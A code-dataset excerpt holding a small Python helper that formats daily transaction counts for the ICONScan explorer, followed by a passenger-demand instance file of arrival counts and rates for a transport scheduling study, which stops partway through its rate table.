3523419065b1165073d737b0d0d30c8dce62fff5 | 105 | py | Python | public/app/views/transactions_count_per_day_big_icx_transfer.py | iconation/ICONScan | 3fb2f364a678a0e8d2b8a4a0d2275fbe8e2e3b50 | [
"Apache-2.0"
] | null | null | null | public/app/views/transactions_count_per_day_big_icx_transfer.py | iconation/ICONScan | 3fb2f364a678a0e8d2b8a4a0d2275fbe8e2e3b50 | [
"Apache-2.0"
] | null | null | null | public/app/views/transactions_count_per_day_big_icx_transfer.py | iconation/ICONScan | 3fb2f364a678a0e8d2b8a4a0d2275fbe8e2e3b50 | [
"Apache-2.0"
] | null | null | null | import json
def process (result):
return list (map (lambda r: [r[0].isoformat(), r[1]], result))[1:] | 26.25 | 70 | 0.628571 | 17 | 105 | 3.882353 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034091 | 0.161905 | 105 | 4 | 70 | 26.25 | 0.715909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
10673d83abd3aecda6e2eb960943d11b62d903a6 | 37,890 | py | Python | instances/passenger_demand/pas-20210421-2109-int14000000000000001e/3.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210421-2109-int14000000000000001e/3.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210421-2109-int14000000000000001e/3.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null |
"""
PASSENGERS
"""
numPassengers = 3225
passenger_arriving = (
(3, 5, 3, 4, 1, 0, 8, 9, 10, 7, 1, 0), # 0
(1, 14, 5, 2, 3, 0, 8, 7, 6, 2, 2, 0), # 1
(2, 9, 6, 5, 5, 0, 6, 13, 2, 2, 3, 0), # 2
(3, 9, 9, 1, 4, 0, 5, 7, 5, 5, 0, 0), # 3
(8, 10, 5, 3, 4, 0, 6, 7, 6, 4, 1, 0), # 4
(4, 9, 5, 3, 1, 0, 7, 6, 10, 7, 2, 0), # 5
(2, 7, 13, 6, 2, 0, 6, 3, 6, 2, 3, 0), # 6
(2, 8, 9, 2, 2, 0, 7, 6, 2, 8, 0, 0), # 7
(4, 7, 12, 6, 0, 0, 1, 7, 9, 4, 5, 0), # 8
(1, 10, 6, 3, 2, 0, 4, 5, 11, 6, 2, 0), # 9
(5, 2, 1, 3, 3, 0, 7, 4, 6, 2, 3, 0), # 10
(5, 8, 7, 7, 3, 0, 8, 8, 7, 5, 1, 0), # 11
(10, 5, 6, 4, 2, 0, 8, 9, 9, 7, 7, 0), # 12
(2, 8, 8, 1, 4, 0, 9, 9, 8, 6, 2, 0), # 13
(2, 10, 3, 7, 2, 0, 7, 10, 7, 4, 1, 0), # 14
(6, 7, 10, 5, 4, 0, 4, 4, 7, 8, 1, 0), # 15
(4, 9, 12, 5, 2, 0, 3, 5, 5, 3, 3, 0), # 16
(3, 11, 7, 2, 3, 0, 3, 5, 4, 7, 2, 0), # 17
(9, 10, 8, 2, 1, 0, 9, 5, 9, 7, 2, 0), # 18
(4, 11, 10, 4, 1, 0, 9, 9, 6, 2, 3, 0), # 19
(5, 10, 10, 4, 2, 0, 6, 12, 8, 4, 3, 0), # 20
(5, 6, 11, 4, 0, 0, 5, 3, 4, 5, 4, 0), # 21
(6, 12, 8, 5, 1, 0, 6, 9, 4, 2, 1, 0), # 22
(2, 5, 4, 3, 1, 0, 7, 6, 12, 5, 1, 0), # 23
(2, 6, 8, 4, 8, 0, 2, 13, 8, 3, 3, 0), # 24
(8, 10, 10, 1, 3, 0, 5, 4, 8, 3, 0, 0), # 25
(4, 8, 9, 4, 3, 0, 6, 10, 4, 6, 4, 0), # 26
(5, 9, 7, 4, 4, 0, 3, 13, 6, 3, 3, 0), # 27
(6, 12, 5, 8, 3, 0, 6, 6, 6, 4, 1, 0), # 28
(6, 9, 6, 1, 4, 0, 6, 8, 6, 7, 3, 0), # 29
(4, 8, 6, 4, 5, 0, 3, 14, 6, 4, 3, 0), # 30
(5, 8, 5, 3, 1, 0, 7, 8, 6, 6, 3, 0), # 31
(7, 6, 8, 2, 2, 0, 6, 10, 5, 9, 1, 0), # 32
(4, 12, 9, 8, 2, 0, 8, 12, 4, 4, 2, 0), # 33
(5, 6, 6, 3, 3, 0, 5, 7, 5, 7, 4, 0), # 34
(6, 9, 8, 3, 0, 0, 8, 11, 10, 2, 2, 0), # 35
(3, 6, 15, 4, 2, 0, 10, 9, 4, 1, 2, 0), # 36
(2, 4, 9, 2, 1, 0, 5, 10, 2, 7, 2, 0), # 37
(2, 6, 6, 4, 2, 0, 6, 5, 5, 8, 2, 0), # 38
(6, 10, 13, 4, 1, 0, 8, 9, 3, 7, 1, 0), # 39
(2, 10, 7, 10, 5, 0, 7, 15, 8, 4, 2, 0), # 40
(3, 8, 2, 6, 2, 0, 3, 3, 6, 9, 3, 0), # 41
(5, 10, 11, 5, 5, 0, 14, 9, 7, 2, 2, 0), # 42
(5, 8, 3, 6, 2, 0, 5, 12, 6, 10, 4, 0), # 43
(7, 8, 12, 5, 3, 0, 10, 9, 7, 6, 0, 0), # 44
(7, 8, 5, 4, 1, 0, 8, 12, 8, 5, 2, 0), # 45
(8, 12, 13, 4, 2, 0, 6, 3, 7, 4, 1, 0), # 46
(7, 11, 10, 4, 1, 0, 1, 4, 2, 3, 3, 0), # 47
(6, 5, 8, 2, 3, 0, 4, 10, 6, 5, 1, 0), # 48
(9, 14, 9, 6, 5, 0, 7, 7, 7, 5, 0, 0), # 49
(1, 12, 9, 1, 0, 0, 4, 8, 5, 1, 2, 0), # 50
(3, 8, 7, 3, 4, 0, 4, 5, 11, 5, 2, 0), # 51
(6, 8, 8, 5, 3, 0, 9, 8, 8, 9, 3, 0), # 52
(4, 7, 13, 3, 5, 0, 4, 5, 4, 5, 2, 0), # 53
(8, 7, 7, 2, 2, 0, 4, 9, 6, 2, 1, 0), # 54
(3, 9, 4, 4, 0, 0, 8, 4, 6, 8, 4, 0), # 55
(3, 9, 12, 2, 4, 0, 6, 4, 8, 5, 2, 0), # 56
(4, 9, 6, 7, 2, 0, 5, 7, 9, 3, 0, 0), # 57
(7, 5, 7, 5, 1, 0, 7, 10, 4, 5, 3, 0), # 58
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 59
)
station_arriving_intensity = (
(3.7095121817383676, 9.515044981060607, 11.19193043059126, 8.87078804347826, 10.000240384615385, 6.659510869565219), # 0
(3.7443308140669203, 9.620858238197952, 11.252381752534994, 8.920190141908213, 10.075193108974359, 6.657240994867151), # 1
(3.7787518681104277, 9.725101964085297, 11.31139817195087, 8.968504830917876, 10.148564102564103, 6.654901690821256), # 2
(3.8127461259877085, 9.827663671875001, 11.368936576156813, 9.01569089673913, 10.22028605769231, 6.652493274456523), # 3
(3.8462843698175795, 9.928430874719417, 11.424953852470724, 9.061707125603865, 10.290291666666668, 6.6500160628019325), # 4
(3.879337381718857, 10.027291085770905, 11.479406888210512, 9.106512303743962, 10.358513621794872, 6.647470372886473), # 5
(3.9118759438103607, 10.12413181818182, 11.53225257069409, 9.150065217391306, 10.424884615384617, 6.644856521739131), # 6
(3.943870838210907, 10.218840585104518, 11.58344778723936, 9.19232465277778, 10.489337339743592, 6.64217482638889), # 7
(3.975292847039314, 10.311304899691358, 11.632949425164242, 9.233249396135266, 10.551804487179488, 6.639425603864735), # 8
(4.006112752414399, 10.401412275094698, 11.680714371786634, 9.272798233695653, 10.61221875, 6.636609171195653), # 9
(4.03630133645498, 10.489050224466892, 11.72669951442445, 9.310929951690824, 10.670512820512823, 6.633725845410628), # 10
(4.065829381279876, 10.5741062609603, 11.7708617403956, 9.347603336352659, 10.726619391025642, 6.630775943538648), # 11
(4.094667669007903, 10.656467897727273, 11.813157937017996, 9.382777173913043, 10.780471153846154, 6.627759782608695), # 12
(4.122786981757876, 10.736022647920176, 11.85354499160954, 9.416410250603866, 10.832000801282053, 6.624677679649759), # 13
(4.15015810164862, 10.81265802469136, 11.891979791488144, 9.448461352657004, 10.881141025641025, 6.621529951690821), # 14
(4.1767518107989465, 10.886261541193182, 11.928419223971721, 9.478889266304348, 10.92782451923077, 6.618316915760871), # 15
(4.202538891327675, 10.956720710578002, 11.96282017637818, 9.507652777777778, 10.971983974358976, 6.61503888888889), # 16
(4.227490125353625, 11.023923045998176, 11.995139536025421, 9.53471067330918, 11.013552083333336, 6.611696188103866), # 17
(4.25157629499561, 11.087756060606061, 12.025334190231364, 9.560021739130436, 11.052461538461543, 6.608289130434783), # 18
(4.274768182372451, 11.148107267554012, 12.053361026313912, 9.58354476147343, 11.088645032051284, 6.604818032910629), # 19
(4.297036569602966, 11.204864179994388, 12.079176931590974, 9.60523852657005, 11.122035256410259, 6.601283212560387), # 20
(4.318352238805971, 11.257914311079544, 12.102738793380466, 9.625061820652174, 11.152564903846153, 6.597684986413044), # 21
(4.338685972100283, 11.307145173961842, 12.124003499000287, 9.642973429951692, 11.180166666666667, 6.5940236714975855), # 22
(4.358008551604722, 11.352444281793632, 12.142927935768354, 9.658932140700484, 11.204773237179488, 6.590299584842997), # 23
(4.3762907594381035, 11.393699147727272, 12.159468991002571, 9.672896739130437, 11.226317307692307, 6.586513043478261), # 24
(4.393503377719247, 11.430797284915124, 12.173583552020853, 9.684826011473431, 11.244731570512819, 6.582664364432368), # 25
(4.409617188566969, 11.46362620650954, 12.185228506141103, 9.694678743961353, 11.259948717948719, 6.5787538647343), # 26
(4.424602974100088, 11.492073425662877, 12.194360740681233, 9.702413722826089, 11.271901442307694, 6.574781861413045), # 27
(4.438431516437421, 11.516026455527497, 12.200937142959157, 9.707989734299519, 11.280522435897437, 6.570748671497586), # 28
(4.4510735976977855, 11.535372809255753, 12.204914600292774, 9.711365564613528, 11.285744391025641, 6.566654612016909), # 29
(4.4625, 11.55, 12.20625, 9.7125, 11.287500000000001, 6.562500000000001), # 30
(4.47319183983376, 11.56215031960227, 12.205248928140096, 9.712295118464054, 11.286861125886526, 6.556726763701484), # 31
(4.4836528452685425, 11.574140056818184, 12.202274033816424, 9.711684477124184, 11.28495815602837, 6.547834661835751), # 32
(4.493887715792838, 11.585967720170455, 12.197367798913046, 9.710674080882354, 11.281811569148937, 6.535910757121439), # 33
(4.503901150895141, 11.597631818181819, 12.19057270531401, 9.709269934640524, 11.277441843971632, 6.521042112277196), # 34
(4.513697850063939, 11.609130859374998, 12.181931234903383, 9.707478043300654, 11.27186945921986, 6.503315790021656), # 35
(4.523282512787724, 11.62046335227273, 12.171485869565219, 9.705304411764708, 11.265114893617023, 6.482818853073463), # 36
(4.532659838554988, 11.631627805397729, 12.159279091183576, 9.70275504493464, 11.257198625886524, 6.4596383641512585), # 37
(4.5418345268542195, 11.642622727272729, 12.145353381642513, 9.699835947712419, 11.248141134751775, 6.433861385973679), # 38
(4.5508112771739135, 11.653446626420456, 12.129751222826087, 9.696553125000001, 11.23796289893617, 6.40557498125937), # 39
(4.559594789002558, 11.664098011363638, 12.11251509661836, 9.692912581699348, 11.22668439716312, 6.37486621272697), # 40
(4.568189761828645, 11.674575390625, 12.093687484903382, 9.68892032271242, 11.214326108156028, 6.34182214309512), # 41
(4.576600895140665, 11.684877272727276, 12.07331086956522, 9.684582352941177, 11.2009085106383, 6.3065298350824595), # 42
(4.584832888427111, 11.69500216619318, 12.051427732487923, 9.679904677287583, 11.186452083333334, 6.26907635140763), # 43
(4.592890441176471, 11.704948579545455, 12.028080555555556, 9.674893300653595, 11.17097730496454, 6.229548754789272), # 44
(4.600778252877237, 11.714715021306818, 12.003311820652177, 9.669554227941177, 11.15450465425532, 6.188034107946028), # 45
(4.6085010230179035, 11.724300000000003, 11.97716400966184, 9.663893464052288, 11.137054609929079, 6.144619473596536), # 46
(4.616063451086957, 11.733702024147728, 11.9496796044686, 9.65791701388889, 11.118647650709221, 6.099391914459438), # 47
(4.623470236572891, 11.742919602272728, 11.920901086956523, 9.651630882352942, 11.099304255319149, 6.052438493253375), # 48
(4.630726078964194, 11.751951242897727, 11.890870939009663, 9.645041074346407, 11.079044902482272, 6.003846272696985), # 49
(4.6378356777493615, 11.760795454545454, 11.85963164251208, 9.638153594771243, 11.057890070921987, 5.953702315508913), # 50
(4.6448037324168805, 11.769450745738636, 11.827225679347826, 9.630974448529413, 11.035860239361703, 5.902093684407797), # 51
(4.651634942455243, 11.777915625, 11.793695531400965, 9.623509640522876, 11.012975886524824, 5.849107442112278), # 52
(4.658334007352941, 11.786188600852274, 11.759083680555555, 9.615765175653596, 10.989257491134753, 5.794830651340996), # 53
(4.6649056265984665, 11.79426818181818, 11.723432608695653, 9.60774705882353, 10.964725531914894, 5.739350374812594), # 54
(4.671354499680307, 11.802152876420456, 11.686784797705313, 9.599461294934642, 10.939400487588653, 5.682753675245711), # 55
(4.677685326086957, 11.809841193181818, 11.649182729468599, 9.59091388888889, 10.913302836879433, 5.625127615358988), # 56
(4.683902805306906, 11.817331640625003, 11.610668885869565, 9.582110845588236, 10.886453058510638, 5.566559257871065), # 57
(4.690011636828645, 11.824622727272727, 11.57128574879227, 9.573058169934642, 10.858871631205675, 5.507135665500583), # 58
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 59
)
passenger_arriving_acc = (
(3, 5, 3, 4, 1, 0, 8, 9, 10, 7, 1, 0), # 0
(4, 19, 8, 6, 4, 0, 16, 16, 16, 9, 3, 0), # 1
(6, 28, 14, 11, 9, 0, 22, 29, 18, 11, 6, 0), # 2
(9, 37, 23, 12, 13, 0, 27, 36, 23, 16, 6, 0), # 3
(17, 47, 28, 15, 17, 0, 33, 43, 29, 20, 7, 0), # 4
(21, 56, 33, 18, 18, 0, 40, 49, 39, 27, 9, 0), # 5
(23, 63, 46, 24, 20, 0, 46, 52, 45, 29, 12, 0), # 6
(25, 71, 55, 26, 22, 0, 53, 58, 47, 37, 12, 0), # 7
(29, 78, 67, 32, 22, 0, 54, 65, 56, 41, 17, 0), # 8
(30, 88, 73, 35, 24, 0, 58, 70, 67, 47, 19, 0), # 9
(35, 90, 74, 38, 27, 0, 65, 74, 73, 49, 22, 0), # 10
(40, 98, 81, 45, 30, 0, 73, 82, 80, 54, 23, 0), # 11
(50, 103, 87, 49, 32, 0, 81, 91, 89, 61, 30, 0), # 12
(52, 111, 95, 50, 36, 0, 90, 100, 97, 67, 32, 0), # 13
(54, 121, 98, 57, 38, 0, 97, 110, 104, 71, 33, 0), # 14
(60, 128, 108, 62, 42, 0, 101, 114, 111, 79, 34, 0), # 15
(64, 137, 120, 67, 44, 0, 104, 119, 116, 82, 37, 0), # 16
(67, 148, 127, 69, 47, 0, 107, 124, 120, 89, 39, 0), # 17
(76, 158, 135, 71, 48, 0, 116, 129, 129, 96, 41, 0), # 18
(80, 169, 145, 75, 49, 0, 125, 138, 135, 98, 44, 0), # 19
(85, 179, 155, 79, 51, 0, 131, 150, 143, 102, 47, 0), # 20
(90, 185, 166, 83, 51, 0, 136, 153, 147, 107, 51, 0), # 21
(96, 197, 174, 88, 52, 0, 142, 162, 151, 109, 52, 0), # 22
(98, 202, 178, 91, 53, 0, 149, 168, 163, 114, 53, 0), # 23
(100, 208, 186, 95, 61, 0, 151, 181, 171, 117, 56, 0), # 24
(108, 218, 196, 96, 64, 0, 156, 185, 179, 120, 56, 0), # 25
(112, 226, 205, 100, 67, 0, 162, 195, 183, 126, 60, 0), # 26
(117, 235, 212, 104, 71, 0, 165, 208, 189, 129, 63, 0), # 27
(123, 247, 217, 112, 74, 0, 171, 214, 195, 133, 64, 0), # 28
(129, 256, 223, 113, 78, 0, 177, 222, 201, 140, 67, 0), # 29
(133, 264, 229, 117, 83, 0, 180, 236, 207, 144, 70, 0), # 30
(138, 272, 234, 120, 84, 0, 187, 244, 213, 150, 73, 0), # 31
(145, 278, 242, 122, 86, 0, 193, 254, 218, 159, 74, 0), # 32
(149, 290, 251, 130, 88, 0, 201, 266, 222, 163, 76, 0), # 33
(154, 296, 257, 133, 91, 0, 206, 273, 227, 170, 80, 0), # 34
(160, 305, 265, 136, 91, 0, 214, 284, 237, 172, 82, 0), # 35
(163, 311, 280, 140, 93, 0, 224, 293, 241, 173, 84, 0), # 36
(165, 315, 289, 142, 94, 0, 229, 303, 243, 180, 86, 0), # 37
(167, 321, 295, 146, 96, 0, 235, 308, 248, 188, 88, 0), # 38
(173, 331, 308, 150, 97, 0, 243, 317, 251, 195, 89, 0), # 39
(175, 341, 315, 160, 102, 0, 250, 332, 259, 199, 91, 0), # 40
(178, 349, 317, 166, 104, 0, 253, 335, 265, 208, 94, 0), # 41
(183, 359, 328, 171, 109, 0, 267, 344, 272, 210, 96, 0), # 42
(188, 367, 331, 177, 111, 0, 272, 356, 278, 220, 100, 0), # 43
(195, 375, 343, 182, 114, 0, 282, 365, 285, 226, 100, 0), # 44
(202, 383, 348, 186, 115, 0, 290, 377, 293, 231, 102, 0), # 45
(210, 395, 361, 190, 117, 0, 296, 380, 300, 235, 103, 0), # 46
(217, 406, 371, 194, 118, 0, 297, 384, 302, 238, 106, 0), # 47
(223, 411, 379, 196, 121, 0, 301, 394, 308, 243, 107, 0), # 48
(232, 425, 388, 202, 126, 0, 308, 401, 315, 248, 107, 0), # 49
(233, 437, 397, 203, 126, 0, 312, 409, 320, 249, 109, 0), # 50
(236, 445, 404, 206, 130, 0, 316, 414, 331, 254, 111, 0), # 51
(242, 453, 412, 211, 133, 0, 325, 422, 339, 263, 114, 0), # 52
(246, 460, 425, 214, 138, 0, 329, 427, 343, 268, 116, 0), # 53
(254, 467, 432, 216, 140, 0, 333, 436, 349, 270, 117, 0), # 54
(257, 476, 436, 220, 140, 0, 341, 440, 355, 278, 121, 0), # 55
(260, 485, 448, 222, 144, 0, 347, 444, 363, 283, 123, 0), # 56
(264, 494, 454, 229, 146, 0, 352, 451, 372, 286, 123, 0), # 57
(271, 499, 461, 234, 147, 0, 359, 461, 376, 291, 126, 0), # 58
(271, 499, 461, 234, 147, 0, 359, 461, 376, 291, 126, 0), # 59
)
passenger_arriving_rate = (
(3.7095121817383676, 7.612035984848484, 6.715158258354756, 3.5483152173913037, 2.000048076923077, 0.0, 6.659510869565219, 8.000192307692307, 5.322472826086956, 4.476772172236504, 1.903008996212121, 0.0), # 0
(3.7443308140669203, 7.696686590558361, 6.751429051520996, 3.5680760567632848, 2.0150386217948717, 0.0, 6.657240994867151, 8.060154487179487, 5.352114085144928, 4.500952701013997, 1.9241716476395903, 0.0), # 1
(3.7787518681104277, 7.780081571268237, 6.786838903170522, 3.58740193236715, 2.0297128205128203, 0.0, 6.654901690821256, 8.118851282051281, 5.381102898550726, 4.524559268780347, 1.9450203928170593, 0.0), # 2
(3.8127461259877085, 7.8621309375, 6.821361945694087, 3.6062763586956517, 2.044057211538462, 0.0, 6.652493274456523, 8.176228846153847, 5.409414538043478, 4.547574630462725, 1.965532734375, 0.0), # 3
(3.8462843698175795, 7.942744699775533, 6.854972311482434, 3.624682850241546, 2.0580583333333333, 0.0, 6.6500160628019325, 8.232233333333333, 5.437024275362319, 4.569981540988289, 1.9856861749438832, 0.0), # 4
(3.879337381718857, 8.021832868616723, 6.887644132926307, 3.6426049214975844, 2.0717027243589743, 0.0, 6.647470372886473, 8.286810897435897, 5.463907382246377, 4.591762755284204, 2.005458217154181, 0.0), # 5
(3.9118759438103607, 8.099305454545455, 6.919351542416455, 3.660026086956522, 2.084976923076923, 0.0, 6.644856521739131, 8.339907692307692, 5.490039130434783, 4.612901028277636, 2.0248263636363637, 0.0), # 6
(3.943870838210907, 8.175072468083613, 6.950068672343615, 3.6769298611111116, 2.0978674679487184, 0.0, 6.64217482638889, 8.391469871794873, 5.515394791666668, 4.633379114895743, 2.043768117020903, 0.0), # 7
(3.975292847039314, 8.249043919753085, 6.979769655098544, 3.693299758454106, 2.1103608974358976, 0.0, 6.639425603864735, 8.44144358974359, 5.5399496376811594, 4.653179770065696, 2.062260979938271, 0.0), # 8
(4.006112752414399, 8.321129820075758, 7.00842862307198, 3.709119293478261, 2.12244375, 0.0, 6.636609171195653, 8.489775, 5.563678940217391, 4.672285748714653, 2.0802824550189394, 0.0), # 9
(4.03630133645498, 8.391240179573513, 7.03601970865467, 3.724371980676329, 2.134102564102564, 0.0, 6.633725845410628, 8.536410256410257, 5.586557971014494, 4.690679805769779, 2.0978100448933783, 0.0), # 10
(4.065829381279876, 8.459285008768239, 7.06251704423736, 3.739041334541063, 2.145323878205128, 0.0, 6.630775943538648, 8.581295512820512, 5.608562001811595, 4.70834469615824, 2.1148212521920597, 0.0), # 11
(4.094667669007903, 8.525174318181818, 7.087894762210797, 3.7531108695652167, 2.156094230769231, 0.0, 6.627759782608695, 8.624376923076923, 5.6296663043478254, 4.725263174807198, 2.1312935795454546, 0.0), # 12
(4.122786981757876, 8.58881811833614, 7.112126994965724, 3.766564100241546, 2.1664001602564102, 0.0, 6.624677679649759, 8.665600641025641, 5.649846150362319, 4.741417996643816, 2.147204529584035, 0.0), # 13
(4.15015810164862, 8.650126419753088, 7.135187874892886, 3.779384541062801, 2.1762282051282047, 0.0, 6.621529951690821, 8.704912820512819, 5.669076811594202, 4.756791916595257, 2.162531604938272, 0.0), # 14
(4.1767518107989465, 8.709009232954545, 7.157051534383032, 3.7915557065217387, 2.1855649038461538, 0.0, 6.618316915760871, 8.742259615384615, 5.6873335597826085, 4.771367689588688, 2.177252308238636, 0.0), # 15
(4.202538891327675, 8.7653765684624, 7.177692105826908, 3.803061111111111, 2.194396794871795, 0.0, 6.61503888888889, 8.77758717948718, 5.7045916666666665, 4.785128070551272, 2.1913441421156, 0.0), # 16
(4.227490125353625, 8.81913843679854, 7.197083721615253, 3.8138842693236716, 2.202710416666667, 0.0, 6.611696188103866, 8.810841666666668, 5.720826403985508, 4.798055814410168, 2.204784609199635, 0.0), # 17
(4.25157629499561, 8.870204848484848, 7.215200514138818, 3.824008695652174, 2.2104923076923084, 0.0, 6.608289130434783, 8.841969230769234, 5.736013043478262, 4.810133676092545, 2.217551212121212, 0.0), # 18
(4.274768182372451, 8.918485814043208, 7.232016615788346, 3.8334179045893717, 2.2177290064102566, 0.0, 6.604818032910629, 8.870916025641026, 5.750126856884058, 4.8213444105255645, 2.229621453510802, 0.0), # 19
(4.297036569602966, 8.96389134399551, 7.247506158954584, 3.8420954106280196, 2.2244070512820517, 0.0, 6.601283212560387, 8.897628205128207, 5.76314311594203, 4.831670772636389, 2.2409728359988774, 0.0), # 20
(4.318352238805971, 9.006331448863634, 7.261643276028279, 3.8500247282608693, 2.2305129807692303, 0.0, 6.597684986413044, 8.922051923076921, 5.775037092391305, 4.841095517352186, 2.2515828622159084, 0.0), # 21
(4.338685972100283, 9.045716139169473, 7.274402099400172, 3.8571893719806765, 2.2360333333333333, 0.0, 6.5940236714975855, 8.944133333333333, 5.785784057971015, 4.849601399600115, 2.2614290347923682, 0.0), # 22
(4.358008551604722, 9.081955425434906, 7.285756761461012, 3.8635728562801934, 2.2409546474358972, 0.0, 6.590299584842997, 8.963818589743589, 5.79535928442029, 4.857171174307341, 2.2704888563587264, 0.0), # 23
(4.3762907594381035, 9.114959318181818, 7.295681394601543, 3.869158695652174, 2.2452634615384612, 0.0, 6.586513043478261, 8.981053846153845, 5.803738043478262, 4.863787596401028, 2.2787398295454544, 0.0), # 24
(4.393503377719247, 9.1446378279321, 7.304150131212511, 3.8739304045893723, 2.2489463141025636, 0.0, 6.582664364432368, 8.995785256410255, 5.810895606884059, 4.869433420808341, 2.286159456983025, 0.0), # 25
(4.409617188566969, 9.17090096520763, 7.311137103684661, 3.8778714975845405, 2.2519897435897436, 0.0, 6.5787538647343, 9.007958974358974, 5.816807246376811, 4.874091402456441, 2.2927252413019077, 0.0), # 26
(4.424602974100088, 9.193658740530301, 7.31661644440874, 3.880965489130435, 2.2543802884615385, 0.0, 6.574781861413045, 9.017521153846154, 5.821448233695653, 4.877744296272493, 2.2984146851325753, 0.0), # 27
(4.438431516437421, 9.212821164421996, 7.320562285775494, 3.8831958937198072, 2.256104487179487, 0.0, 6.570748671497586, 9.024417948717948, 5.824793840579711, 4.8803748571836625, 2.303205291105499, 0.0), # 28
(4.4510735976977855, 9.228298247404602, 7.322948760175664, 3.884546225845411, 2.257148878205128, 0.0, 6.566654612016909, 9.028595512820512, 5.826819338768117, 4.881965840117109, 2.3070745618511506, 0.0), # 29
(4.4625, 9.24, 7.32375, 3.885, 2.2575000000000003, 0.0, 6.562500000000001, 9.030000000000001, 5.8275, 4.8825, 2.31, 0.0), # 30
(4.47319183983376, 9.249720255681815, 7.323149356884057, 3.884918047385621, 2.257372225177305, 0.0, 6.556726763701484, 9.02948890070922, 5.827377071078432, 4.882099571256038, 2.312430063920454, 0.0), # 31
(4.4836528452685425, 9.259312045454546, 7.3213644202898545, 3.884673790849673, 2.2569916312056737, 0.0, 6.547834661835751, 9.027966524822695, 5.82701068627451, 4.880909613526569, 2.3148280113636366, 0.0), # 32
(4.493887715792838, 9.268774176136363, 7.3184206793478275, 3.8842696323529413, 2.2563623138297872, 0.0, 6.535910757121439, 9.025449255319149, 5.826404448529412, 4.878947119565218, 2.3171935440340907, 0.0), # 33
(4.503901150895141, 9.278105454545454, 7.314343623188405, 3.8837079738562093, 2.2554883687943263, 0.0, 6.521042112277196, 9.021953475177305, 5.825561960784314, 4.876229082125604, 2.3195263636363634, 0.0), # 34
(4.513697850063939, 9.287304687499997, 7.3091587409420296, 3.882991217320261, 2.2543738918439717, 0.0, 6.503315790021656, 9.017495567375887, 5.824486825980392, 4.872772493961353, 2.3218261718749993, 0.0), # 35
(4.523282512787724, 9.296370681818182, 7.302891521739131, 3.8821217647058828, 2.253022978723404, 0.0, 6.482818853073463, 9.012091914893617, 5.823182647058824, 4.868594347826087, 2.3240926704545455, 0.0), # 36
(4.532659838554988, 9.305302244318183, 7.295567454710145, 3.881102017973856, 2.2514397251773044, 0.0, 6.4596383641512585, 9.005758900709218, 5.821653026960784, 4.86371163647343, 2.3263255610795457, 0.0), # 37
(4.5418345268542195, 9.314098181818181, 7.287212028985508, 3.8799343790849674, 2.249628226950355, 0.0, 6.433861385973679, 8.99851290780142, 5.819901568627452, 4.858141352657005, 2.3285245454545453, 0.0), # 38
(4.5508112771739135, 9.322757301136363, 7.277850733695652, 3.87862125, 2.247592579787234, 0.0, 6.40557498125937, 8.990370319148935, 5.817931875, 4.8519004891304345, 2.330689325284091, 0.0), # 39
(4.559594789002558, 9.33127840909091, 7.267509057971015, 3.8771650326797387, 2.245336879432624, 0.0, 6.37486621272697, 8.981347517730496, 5.815747549019608, 4.845006038647344, 2.3328196022727274, 0.0), # 40
(4.568189761828645, 9.3396603125, 7.256212490942029, 3.8755681290849675, 2.2428652216312055, 0.0, 6.34182214309512, 8.971460886524822, 5.813352193627452, 4.837474993961353, 2.334915078125, 0.0), # 41
(4.576600895140665, 9.34790181818182, 7.2439865217391315, 3.8738329411764707, 2.2401817021276598, 0.0, 6.3065298350824595, 8.960726808510639, 5.810749411764706, 4.829324347826088, 2.336975454545455, 0.0), # 42
(4.584832888427111, 9.356001732954544, 7.230856639492753, 3.8719618709150327, 2.2372904166666667, 0.0, 6.26907635140763, 8.949161666666667, 5.80794280637255, 4.820571092995169, 2.339000433238636, 0.0), # 43
(4.592890441176471, 9.363958863636363, 7.216848333333333, 3.8699573202614377, 2.2341954609929076, 0.0, 6.229548754789272, 8.93678184397163, 5.804935980392157, 4.811232222222222, 2.3409897159090907, 0.0), # 44
(4.600778252877237, 9.371772017045453, 7.201987092391306, 3.8678216911764705, 2.230900930851064, 0.0, 6.188034107946028, 8.923603723404256, 5.801732536764706, 4.80132472826087, 2.3429430042613633, 0.0), # 45
(4.6085010230179035, 9.379440000000002, 7.186298405797103, 3.8655573856209147, 2.2274109219858156, 0.0, 6.144619473596536, 8.909643687943262, 5.798336078431372, 4.790865603864735, 2.3448600000000006, 0.0), # 46
(4.616063451086957, 9.386961619318182, 7.16980776268116, 3.8631668055555552, 2.223729530141844, 0.0, 6.099391914459438, 8.894918120567375, 5.794750208333333, 4.77987184178744, 2.3467404048295455, 0.0), # 47
(4.623470236572891, 9.394335681818182, 7.152540652173913, 3.8606523529411763, 2.21986085106383, 0.0, 6.052438493253375, 8.87944340425532, 5.790978529411765, 4.7683604347826085, 2.3485839204545456, 0.0), # 48
(4.630726078964194, 9.401560994318181, 7.134522563405797, 3.8580164297385626, 2.2158089804964543, 0.0, 6.003846272696985, 8.863235921985817, 5.787024644607844, 4.7563483756038645, 2.3503902485795454, 0.0), # 49
(4.6378356777493615, 9.408636363636361, 7.115778985507247, 3.8552614379084966, 2.211578014184397, 0.0, 5.953702315508913, 8.846312056737588, 5.782892156862745, 4.743852657004831, 2.3521590909090904, 0.0), # 50
(4.6448037324168805, 9.415560596590907, 7.096335407608696, 3.852389779411765, 2.2071720478723407, 0.0, 5.902093684407797, 8.828688191489363, 5.778584669117648, 4.73089027173913, 2.353890149147727, 0.0), # 51
